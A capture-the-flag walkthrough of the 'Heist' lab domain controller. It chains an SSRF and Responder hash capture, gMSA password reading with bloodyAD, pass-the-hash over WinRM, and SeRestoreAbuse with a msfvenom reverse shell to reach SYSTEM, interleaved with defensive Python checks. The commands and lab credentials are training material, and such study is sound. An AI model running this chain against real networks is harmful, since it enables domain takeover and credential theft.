Proving Grounds Practice - Heist

Difficulty

Hard

Scan

autorecon 192.168.149.165

[*] domain found on tcp/53.
dns domain

[*] kerberos-sec found on tcp/88.
kerberos-sec


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] ldap found on tcp/389. / 3268
heist.offsec
rootDomainNamingContext: DC=heist,DC=offsec
| ldapServiceName: heist.offsec:dc01$@HEIST.OFFSEC

[*] microsoft-ds found on tcp/445.
SMB 3.0


[*] kpasswd5 found on tcp/464.

[*] ncacn_http found on tcp/593.

[*] ms-wbt-server found on tcp/3389.
commonName=DC01.heist.offsec


[*] http found on tcp/8080.
Server: Werkzeug/2.0.1 Python/3.9.0

ssrf
http://192.168.149.165:8080/?url=http://localhost:8080


[*] tcpwrapped found on tcp/636.

[*] tcpwrapped found on tcp/3269.

[*] wsman found on tcp/5985.
WinRM


[*] mc-nmf found on tcp/9389.

[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] ncacn_http found on tcp/49673.
[*] msrpc found on tcp/49674.
[*] msrpc found on tcp/49677.
[*] msrpc found on tcp/49704.
[*] msrpc found on tcp/49786.

[*] domain found on udp/53.

[*] kerberos-sec found on udp/88.

[*] ntp found on udp/123.

domain dig

First add heist.offsec and dc1.heist.offsec to /etc/hosts.

dig @192.168.149.165 AXFR heist.offsec

; <<>> DiG 9.20.2-1-Debian <<>> @192.168.149.165 AXFR heist.offsec
; (1 server found)
;; global options: +cmd
; Transfer failed.

rpcclient

rpcclient 192.168.149.165 -N
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE

smbclient

smbclient -L //192.168.149.165 -N
session setup failed: NT_STATUS_ACCESS_DENIED

ldapsearch

ldapsearch -H ldap://192.168.149.165 -x -b "DC=offsec,DC=heist" |tee ldap_dump
# extended LDIF
#
# LDAPv3
# base <DC=offsec,DC=heist> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

8080

whatweb

whatweb -a 3 http://192.168.149.165:8080
http://192.168.149.165:8080 [200 OK] Bootstrap[3.3.6], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/2.0.1 Python/3.9.0], IP[192.168.149.165], JQuery[2.2.2], Python[3.9.0], Script, Title[Super Secure Web Browser], Werkzeug[2.0.1]

gobuster

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.149.165:8080 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.149.165:8080
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

ssrf vuln

Visiting http://192.168.149.165:8080/ shows a page with a single input box that asks for a URL. Entering http://192.168.149.165:8080/

returns the same page again, which confirms the SSRF vulnerability.
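The control this application is missing, as an added example that is not code from the writeup or from the target application: before a server-side fetcher follows a user-supplied URL, it should check that the target is an http(s) URL whose host resolves only to public addresses. That rejects both the loopback probe above (localhost:8080) and fetches to private ranges such as the 192.168.x.x host used later in the Foothold section. The Werkzeug/Python app on port 8080 is assumed to be Flask-style and to call a function like this; the resolver hook and the addresses in the comments are assumptions of the example.

```python
"""Added example (not part of the original writeup): validate a user-supplied fetch
target so the server never requests loopback, private or link-local addresses."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host: str) -> list:
    """Resolve a hostname to every address it maps to (IPv4 and IPv6)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_target(url: str, resolver=_default_resolver) -> bool:
    """Return True only if url is http(s), carries no embedded credentials, and every
    address its host resolves to is a globally routable unicast address.

    Rejected: loopback (127.0.0.0/8, ::1), RFC 1918 and other private ranges,
    link-local, multicast, unspecified and reserved addresses."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if not parts.hostname or parts.username or parts.password:
        return False
    try:
        # A literal IP needs no lookup; any other host goes through the resolver.
        ipaddress.ip_address(parts.hostname)
        addresses = [parts.hostname]
    except ValueError:
        try:
            addresses = resolver(parts.hostname)
        except (socket.gaierror, OSError):
            return False
    if not addresses:
        return False
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False
        # is_global is False for private, loopback, link-local, reserved and
        # unspecified ranges; multicast is checked separately.
        if not ip.is_global or ip.is_multicast:
            return False
    return True


if __name__ == "__main__":
    for candidate in ("http://localhost:8080", "http://127.0.0.1:8080/",
                      "http://192.168.45.165/", "http://8.8.8.8/"):
        print(candidate, "->", "allowed" if is_safe_target(candidate) else "blocked")
```

Two points that matter for this box: the fetch must connect to the address that was validated (resolve once, connect to that IP) rather than resolving the name a second time, and the fetcher must not answer an HTTP 401 NTLM challenge with the service's own credentials, which is what handed Responder the NTLMv2 hash in the next section.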

Foothold

So far we have no user-related information. If we could capture an NTLMv2 hash we would have a foothold, so next we use Responder to capture the hash sent during the authentication handshake.

Start Responder on Kali and enter the address of Kali's port 80, http://192.168.45.165/, in the input box; this captures an NTLMv2 hash.

sudo responder -I tun0 -wv
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.5.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
....

[+] Listening for events...

[!] Error starting TCP server on port 3389, check permissions or other servers running.
[HTTP] Sending NTLM authentication request to 192.168.149.165
[HTTP] GET request from: ::ffff:192.168.149.165 URL: /
[HTTP] NTLMv2 Client : 192.168.149.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:c22b3ec3fb2f[...]

Now that we have the hash, the next step is cracking it: hashcat -m 5600 enox.hash /usr/share/wordlist/rockyou.txt, which gives the password enox:california

Next we try to log in over RDP on 3389 with this password; the login fails.

xfreerdp +clipboard /u:enox /p:california /v:192.168.149.165 /d:heist.offsec
[00:07:24:582] [2881148:2881151] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[00:07:24:582] [2881148:2881151] [WARN][com.freerdp.crypto] - CN = DC01.heist.offsec
[00:07:24:200] [2881148:2881151] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[00:07:24:200] [2881148:2881151] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:07:26:808] [2881148:2881151] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Logging in to SMB yields nothing useful.

smbclient -L //192.168.149.165 -U enox
Password for [WORKGROUP\enox]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.149.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient //192.168.149.165/netlogon -U enox
Password for [WORKGROUP\enox]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 20 19:01:21 2021
.. D 0 Tue Jul 20 19:01:21 2021

7706623 blocks of size 4096. 3249419 blocks available
smb: \> exit

smbclient //192.168.149.165/sysvol -U enox
Password for [WORKGROUP\enox]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 20 19:01:21 2021
.. D 0 Tue Jul 20 19:01:21 2021
heist.offsec Dr 0 Tue Jul 20 19:01:21 2021

7706623 blocks of size 4096. 3249419 blocks available
smb: \> cd heist.offsec
smb: \heist.offsec\> ls
. D 0 Tue Jul 20 19:07:47 2021
.. D 0 Tue Jul 20 19:07:47 2021
DfsrPrivate DHSr 0 Tue Jul 20 19:07:47 2021
Policies D 0 Tue Jul 20 19:01:30 2021
scripts D 0 Tue Jul 20 19:01:21 2021

evil-winrm login succeeds

evil-winrm -i 192.168.149.165 -u enox -p california

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> ls
*Evil-WinRM* PS C:\Users\enox\Documents> cd ..

Escalation

In enox's Desktop folder we find todo.txt.

Then in the /Users directory we find a user svc_apache$, which may be an exploitation point.

Routine enumeration of enox's privileges, running processes and services yielded nothing, and running winPEAS gave no useful information for privilege escalation either. But since this is AD, we upload SharpHound.ps1 to collect domain information.

bloodhound

*Evil-WinRM* PS C:\users\enox> . .\sharphound.ps1
*Evil-WinRM* PS C:\users\enox> invoke-bloodhound -collectionmethod all -outputprefix "audit" -outputdirectory "/users/enox"
*Evil-WinRM* PS C:\Users\enox> download audit_20250303064734_BloodHound.zip

Info: Downloading C:\Users\enox\audit_20250303064734_BloodHound.zip to audit_20250303064734_BloodHound.zip

Info: Download successful!

ReadGMSAPassword

In BloodHound we can see that WEB ADMINS, a group enox belongs to, has ReadGMSAPassword over SVC_APACHE$.

"ReadGMSAPassword" generally refers to a permission that allows an account to read the password of a Group Managed Service Account (gMSA) in Active Directory. gMSA is a special service-account type introduced in Windows Server 2012 for automated password management, and is widely used by services and applications in domain environments.

Characteristics of gMSA

The password is generated and managed automatically by the domain controller (DC) (a 240-byte random password).

It is rotated automatically every 30 days by default (configurable).

Multiple hosts can run services under the same account, which removes the single-machine limitation of the traditional MSA (Managed Service Account).

The password is stored in the msDS-ManagedPassword attribute of the AD object.

Meaning of ReadGMSAPassword

In AD, access to a gMSA's password is controlled by the msDS-GroupMSAMembership attribute, which defines which security principals (users, groups or computers) may read the password.

If an account holds the "ReadGMSAPassword" permission (normally expressed as the RIGHT_DS_READ_PROPERTY access right), it can retrieve the gMSA's current password.
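The defender's side of this attribute, as an added example that is not from the writeup or from any tool it uses: msDS-GroupMSAMembership is a security descriptor, and its access-allowed ACEs name the principals that may retrieve the managed password. The check below parses that descriptor in SDDL form and flags any allowed reader that is not a computer account, which is exactly the misconfiguration found here (a group of human admins, Web Admins, can read svc_apache$'s password). The SDDL string and the SID-to-object map are constructed for the example; in practice both come from an LDAP query against the domain.

```python
"""Added example (not from the writeup): audit who may read a gMSA's password from its
msDS-GroupMSAMembership security descriptor, given in SDDL form."""
import re

# Constructed directory lookup standing in for an LDAP search on objectSid.
DIRECTORY = {
    "S-1-5-21-1111111111-2222222222-3333333333-1000": ("DC01$", "computer"),
    "S-1-5-21-1111111111-2222222222-3333333333-1108": ("Web Admins", "group"),
    "S-1-5-21-1111111111-2222222222-3333333333-1104": ("enox", "user"),
}

# Constructed msDS-GroupMSAMembership value in SDDL form: an owner (Builtin\Administrators)
# and a DACL whose 'A' (access-allowed) ACEs name the SIDs allowed to read the password.
# SDDL ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee_sid)
SAMPLE_SDDL = (
    "O:S-1-5-32-544"
    "D:"
    "(A;;0xf01ff;;;S-1-5-21-1111111111-2222222222-3333333333-1000)"
    "(A;;0xf01ff;;;S-1-5-21-1111111111-2222222222-3333333333-1108)"
)

ACE_RE = re.compile(r"\((\w+);([^;]*);([^;]*);([^;]*);([^;]*);([^)]+)\)")


def allowed_readers(sddl: str) -> list:
    """Return the trustee SID of every access-allowed ACE in the DACL of an SDDL string."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1]
    dacl = dacl.split("S:", 1)[0]  # stop at the SACL if one is present
    return [m.group(6) for m in ACE_RE.finditer(dacl) if m.group(1) == "A"]


def audit_gmsa_readers(sddl: str, directory: dict) -> list:
    """Return (sid, name, objectClass) for each allowed reader that is not a computer
    account. A group is flagged because every member of it inherits the right, so a
    group should only appear here if it contains nothing but the intended host accounts."""
    findings = []
    for sid in allowed_readers(sddl):
        name, obj_class = directory.get(sid, ("<unknown>", "unknown"))
        if obj_class != "computer":
            findings.append((sid, name, obj_class))
    return findings


if __name__ == "__main__":
    for sid, name, obj_class in audit_gmsa_readers(SAMPLE_SDDL, DIRECTORY):
        print(f"[!] non-computer principal can read the gMSA password: {name} ({obj_class}, {sid})")
```

Run against every gMSA in the domain, this turns the BloodHound edge into a routine check: the expected readers are the hosts that run the service, and any user or group of users appearing in the list should be reviewed.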

So the next step is obtaining svc_apache$'s password.

We test gMSADumper.py, which BloodHound points to; running it only lists who can read the password, which we already know.

python gMSADumper.py -u enox -p california -d heist.offsec
Unable to start a TLS connection. Is LDAPS enabled? Only ACLs will be listed and not ms-DS-ManagedPassword.

Users or groups who can read password for svc_apache$:
> DC01$
> Web Admins

Searching for "readgmsapassword" turns up the following link:

https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword

bloodyAD: https://github.com/CravateRouge/bloodyAD

The NTLM hash is read successfully: 0c43e5ad6bc9104cfb94d56f4aecb4ab

./bloodyAD.py --host 192.168.149.165 -d heist.offsec -u enox -p california get object svc_apache$ --attr msDS-ManagedPassword

distinguishedName: CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:0c43e5ad6bc9104cfb94d56f4aecb4ab
msDS-ManagedPassword.B64ENCODED: b8iUgZTAehetubX0QcQQoLkmMSjGS7MXKpta94CcZvY4hej/0kCetCW0BVRtyfpubMbV/SECcA0VvsH2dvzZjsna1RLixNOQEedehbIpHdPFmvVcgwl30oBm2/+HJ8p0ox2VYjB/bjTx3VLiInMHzriTIlFLAL/j7feKC383nDPSpyUnfza62KJFYBHcQA//XGJ9rcl33pTN1IdYeEpzOcNzmca2QRdtIbBLpDTsRceO0qafC8a1yYkDtmfC1JmZxG9T3BopaW8Xl1Jjc1hTUDr9rAtGuUCSDCrTY50hI2B9HzkMXoAzPVz0L7amoE0X4QPNtGWDrM4+fg3//AUARw==

Pass The Hash

Checking svc_apache$'s privileges shows SeRestorePrivilege

evil-winrm -i 192.168.149.165 -u "svc_apache$" -H "0c43e5ad6bc9104cfb94d56f4aecb4ab"

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> ls


Directory: C:\Users\svc_apache$\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2021 8:27 AM 3213 EnableSeRestorePrivilege.ps1


*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeRestorePrivilege

SeRestorePrivilege is a Windows privilege whose full name is "Restore files and directories". It belongs to the set of security privileges, is normally held by system administrators or other high-privilege accounts, and is used for operations that involve system-level restore or modification.

  • Usually granted to the Administrators group (local administrators).
  • In a domain environment it may be held by Domain Admins or by specific service accounts (such as backup services).
  • By default, non-administrator users do not have this privilege.

What it allows:

  1. Bypassing file permissions: ignore the ACL of a file or directory and write to or overwrite its contents directly. Example: even if a file only allows SYSTEM to write, a holder of this privilege can modify it.
  2. Modifying the registry: including restricted keys such as HKEY_LOCAL_MACHINE\SAM and HKEY_LOCAL_MACHINE\SECURITY; this can be used to add users, change permissions, and so on.
  3. Restoring backups: together with backup tools (such as Windows Server Backup), restore system files or data.

In short: the right to modify system files.
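The same fact viewed from the defender's side, as an added example that is not from the writeup: a service account holding SeRestorePrivilege is administrator-equivalent, so token privileges should be audited, not just group memberships. The block parses `whoami /priv` output in the format shown above and flags the privileges that amount to administrative access. The sample text is constructed from the page's svc_apache$ listing, and the list of sensitive privileges is this example's own selection, not a page value.

```python
"""Added example (not from the writeup): parse `whoami /priv` output and flag token
privileges that let the holder bypass normal file, registry or process security."""
import re

# Privileges that effectively grant administrative control when held by a non-admin
# account; the selection is this example's own.
SENSITIVE_PRIVILEGES = {
    "SeRestorePrivilege": "write to any file or registry key regardless of its ACL",
    "SeBackupPrivilege": "read any file or registry key regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including those running as SYSTEM",
    "SeImpersonatePrivilege": "impersonate any client that connects to the process",
    "SeAssignPrimaryTokenPrivilege": "replace the primary token of a process",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Constructed sample in the layout `whoami /priv` prints (mirrors the svc_apache$ listing).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# name, free-text description, then the State column at the end of the row
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege_name: state} for every privilege row in `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def flag_sensitive(privs: dict) -> dict:
    """Return the sensitive privileges present in the token, whatever their state:
    a Disabled privilege is still held and can be enabled by the token owner, so it
    counts as much as an Enabled one."""
    return {name: SENSITIVE_PRIVILEGES[name] for name in privs if name in SENSITIVE_PRIVILEGES}


if __name__ == "__main__":
    found = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name, why in flag_sensitive(found).items():
        print(f"[!] {name} ({found[name]}): {why}")
```

The fix on the host side is the matching one: remove the privilege from the service account through the "Restore files and directories" user right assignment (Local Security Policy or GPO) and confirm with `whoami /priv` in the service's own context that it is gone.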

Using SeRestoreAbuse.exe to run a reverse shell gives us an administrator shell.

SeRestoreAbuse: https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe -o r.exe

*Evil-WinRM* PS C:\Users\svc_apache$> upload SeRestoreAbuse.exe

Info: Uploading /home/kali/Tools/pg/Heist/SeRestoreAbuse.exe to C:\Users\svc_apache$\SeRestoreAbuse.exe

Data: 22528 bytes of 22528 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_apache$> upload r.exe

Info: Uploading /home/kali/Tools/pg/Heist/r.exe to C:\Users\svc_apache$\r.exe

Data: 9556 bytes of 9556 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_apache$> .\SeRestoreAbuse.exe C:\Users\svc_apache$\r.exe
RegCreateKeyExA result: 0
RegSetValueExA result: 0
SeRestoreAbuse.exe : start-service : Service 'Secondary Logon (seclogon)' cannot be started due to the following error: Cannot start
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.149.165] 52353
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
